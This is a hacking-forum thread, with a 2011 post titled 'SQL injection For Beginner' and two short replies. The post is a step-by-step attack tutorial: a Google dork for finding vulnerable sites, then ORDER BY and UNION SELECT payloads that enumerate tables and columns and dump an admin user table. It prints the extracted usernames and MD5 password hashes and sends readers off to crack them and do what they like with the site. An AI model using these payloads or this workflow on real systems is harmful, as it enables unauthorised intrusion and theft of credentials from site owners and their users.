.:: Blackc0de Forum ::.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

-=Explore The World From Our Binary=-
 
HomeIndeksLatest imagesPendaftaranLogin

 

 SQL injection For Beginner :)

Go down 
3 posters
PengirimMessage
Roy Sukro
VIP Member
VIP Member
Roy Sukro


Jumlah posting : 392
Points : 711
Reputation : 17
Join date : 06.02.11
Age : 35
Lokasi : dimana-mana ada ^^

SQL injection For Beginner :)  Empty
PostSubyek: SQL injection For Beginner :)    SQL injection For Beginner :)  Icon_minitimeSun Dec 04, 2011 12:21 pm

In this tutorial you will understand how SQL INJECTION DONE in a very simple way.

SQL INJECTION is an attack technique used to exploit web sites by altering backend SQL statements through manipulating application input.

Here we go!!

1). Search for a vulnerable site.
inurl:index.php?id=
you Can Get More Dorks This was The Just Example

2.Suppose we have this one.


Code:
[You must be registered and logged in to see this link.]
We will check it's vulnerability by adding magic qoute (') at the end of the url.

3.So the url will be like this:

[You must be registered and logged in to see this link.]

And we hit enter and we got this result.

Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6\';
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1)
Database error: next_record called with no query pending.
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1)


If you got an error, some text missing or a blank page the site is vulnerable but not at all.

Now we know that the site is vulnerable.

4.The next step is find out how many columns the database contain
To find it we use "order by" (without the qoute) and this string " -- " (no qoute).

It will look like this:

[You must be registered and logged in to see this link.] order by 1-- (no error)

[You must be registered and logged in to see this link.] order by 2-- (no error)

[You must be registered and logged in to see this link.] order by 3-- (no error)

we move a little higher. (it doesn't matter)

[You must be registered and logged in to see this link.] 10-- (no error)

[You must be registered and logged in to see this link.] 14-- (no error)


until we got an error:

[You must be registered and logged in to see this link.] 15-- (we got an error)

now we got an error on this column:it will lok like this.


Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6 order by 15--;
mySQL Error: 1054 (Unknown column '15' in 'order clause')
Database error: next_record called with no query pending.
mySQL Error: 1054 (Unknown column '15' in 'order clause')


this mean the database contain only 14 columns.

5.. Now use "-" (negative quote) and union select statement.

using this we can select more data in one sql statement.

Look like this:

[You must be registered and logged in to see this link.] union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14--

we hit enter.

numbers appears..
Like this:


6
, 5

8



6.Now we will check it's MYSQL VERSION. We will add @@version on the numbers appear on the previous step.

lemme say i choose 8.. we will replace 8 with @@version,so it will look like this.

[You must be registered and logged in to see this link.] 1, 2, 3, 4, 5, 6, 7, @@version, 9, 10, 11, 12, 13, 14--

and you will get a result like this:


6
, 5

5.1.32 <--this is the version


now we get the version: ;-)

7.Getting Table Name.

We use group_concat(table_name).
replace @@version with group_concat(table_name)

and look like this:
[You must be registered and logged in to see this link.] union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14--

were not done already: (don't hit enter)

between number 14 and this "--" (quote) insert this:

+from+information_schema.tables+where+table_schema =database()--

it will look like this:

[You must be registered and logged in to see this link.] union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_sche ma=database()--

we hit enter and got this result:
Blurb,FileUpload,Inquiries,NewsArticle,ProjectPhot o,active_sessions_split,auth_u​ser_md5

8. Now we're done on TABLE NAME, we move on to COLUMN NAME.

use this string group_concat(column_name)

replace group_concat(table_name) to group_concat(column_name).

but before that we must choose one column. i choose auth_user_md5 because this is must or what we want.

for better result we need to hex auth_user_md5.

Go to this Link: Click here!

TRANSLATOR, BINARY

paste auth_user_md5 to the text box and click encode.

now we get the hex of auth_user_md5: look like this: 61 75 74 68 5f 75 73 65 72 5f 6d 64 35

before proceeding remove space between each numbers. like this: 617574685f757365725f6d6435

Now replace group_concat(table_name) to group_concat(column_name).

like this:
[You must be registered and logged in to see this link.] union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_sche ma=database()--

replace also +from+information_schema.tables+where+table_schema =database()--
to
+from+information_schema.columns+where+table_name= 0x617574685f757365725f6d6435--

(The yellow letter and numbers is the auth_user_md5 hex we encoded)

Note: always add 0x before the hex. Like above.

Here is the result:

[You must be registered and logged in to see this link.] union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.columns+where+table_nam e=0x617574685f757365725f6d6435--

Now hit enter: and you got result like this.
UserID,Username,Password,Perms,FirstName,MiddleNam e,LastName,Position,EmailAddre​ss,ContactNumbers,D ateCreated,CreatedBy,DateModified,ModifiedBy,Statu s

9.We use 0x3a to obtain what we want from the DATABASE like pass, username, etc..etc..

Replace group_concat(column_name) to group_concat(UserID,0x3a,Username,0x3a,Password,0x 3a,Perms,0x3a,FirstName,0x3a,M​iddleName,0x3a,Last Name,0x3a,Position,0x3a,EmailAddress,0x3a,ContactN umbers,0x3a​,DateCreated,0x3a,CreatedBy,0x3a,DateM odified,0x3a,ModifiedBy,0x3aStatus)

but i prefer to do this one group_concat(Username,0x3a,Password) for less effort.

and replace also information_schema.columns+where+table_name=0x6175 74685f757365725f6d6435-- to +from+auth_user_md5--

617574685f757365725f6d6435 is the hex value of auth_user_md5 so we replace it.

Result look like this:

[You must be registered and logged in to see this link.] union select 1, 2, 3, 4, 5, 6, 7,group_concat(Username,0x3a,Password), 9, 10, 11, 12, 13, 14+from+auth_user_md5--

i hit enter we got this:
admin username: k2admin / admin
password in md5 hash:21232f297a57a5a743894a0e4a801fc3 / 97fda9951fd2d6c75ed53484cdc6ee2d

10.Because the password is in md5 hash we need to crack it.

Go to this link:Click here!
[You must be registered and logged in to see this link.]

Were done it's up to you what you want to do to the site after cracking the md5.
congratulation!!!
__________________
Kembali Ke Atas Go down
http://www.google.com
vampire77
NuuBiiTooL
NuuBiiTooL
vampire77


Jumlah posting : 11
Points : 11
Reputation : 0
Join date : 11.02.13

SQL injection For Beginner :)  Empty
PostSubyek: Re: SQL injection For Beginner :)    SQL injection For Beginner :)  Icon_minitimeMon Feb 11, 2013 11:50 pm

bang maaf cara ngbuka user admin web yang ada portalnya gimana yach ???
Kembali Ke Atas Go down
robofics
VIP Member
VIP Member
robofics


Jumlah posting : 709
Points : 804
Reputation : 20
Join date : 22.12.11
Lokasi : /dev/null

SQL injection For Beginner :)  Empty
PostSubyek: Re: SQL injection For Beginner :)    SQL injection For Beginner :)  Icon_minitimeFri Feb 15, 2013 9:05 am

vampire77 wrote:
bang maaf cara ngbuka user admin web yang ada portalnya gimana yach ???

dude, this is international forum..english only, please SQL injection For Beginner :)  3529815765

Kembali Ke Atas Go down
http://robofics.wordpress.com
Sponsored content





SQL injection For Beginner :)  Empty
PostSubyek: Re: SQL injection For Beginner :)    SQL injection For Beginner :)  Icon_minitime

Kembali Ke Atas Go down
 
SQL injection For Beginner :)
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» SQL injection v5
» CMS 4.x.x Zorder (SQL Injection Vul)
» Marinet SQL Injection
» Top 15 SQL Injection Scanners
» How to Deface with HTML Injection

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: BoarD Blackc0de :: International Room :: Hacking & Security (Int.)-
Navigasi: